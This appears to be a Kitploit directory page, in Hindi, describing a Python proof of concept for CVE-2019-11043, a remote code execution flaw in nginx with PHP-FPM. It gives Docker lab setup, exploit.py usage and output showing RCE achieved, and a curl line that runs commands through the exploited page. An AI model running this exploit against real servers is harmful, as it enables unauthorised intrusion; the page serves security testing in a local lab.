Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-11043 — (PoC) neex द्वारा CVE-2019-11043 एक्सप्लॉइट का पायथन संस्करण | Kitploit
उपकरण/GitHubGitHub/themiddleblue/cve-2019-11043
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubthemiddleblue/cve-2019-11043

CVE-2019-11043

(PoC) neex द्वारा CVE-2019-11043 एक्सप्लॉइट का पायथन संस्करण

रिपॉजिटरी देखें
146456 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PoC CVE-2019-11043

CVE-2019-11043 एक्सप्लॉइट का एक Python संस्करण https://github.com/neex/phuip-fpizdam
यह PoC अभी भी एक ड्राफ्ट है, कृपया @neex द्वारा लिखित एक्सप्लॉइट का उपयोग करें
भेद्यता विश्लेषण: https://paper.seebug.org/1064/

PoC सेटअप

nginx और php-fpm को चालू करने के लिए बस docker compose चलाएँ:

root@kitploit:~
# docker-compose up -d
Creating network "cve-2019-11043-git_app_net" with driver "bridge"
Creating php   ... done
Creating nginx ... done

यदि आप php-fpm लॉग पढ़ना चाहते हैं, तो आप यह चला सकते हैं:

root@kitploit:~
docker logs --tail 10 --follow php

एक्सप्लॉइट

root@kitploit:~
# python3 exploit.py --url http://localhost/index.php
[*] QSL candidate: 1752, 1757, 1762
[*] Target seems vulnerable: PHPSESSID=05b156ea034b903de6624f09c513541c; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://localhost/index.php?a=bin/ls+/

यदि आप केवल भेद्यता की जाँच करना चाहते हैं, एक्सप्लॉइट को छोड़ते हुए:

root@kitploit:~
python3 exploit.py --url http://localhost/index.php --skip-rce
#...
python3 exploit.py --url http://localhost/index.php --reset

आप --reset के साथ php-fpm प्रक्रिया को समाप्त करने और सभी इंजेक्ट की गई PHP सेटिंग्स को रीसेट करने का प्रयास कर सकते हैं:

root@kitploit:~
python3 exploit.py --url http://localhost/index.php --reset

वीडियो PoC

https://twitter.com/Menin_TheMiddle/status/1188776386569355265

टूल डाउनलोड करें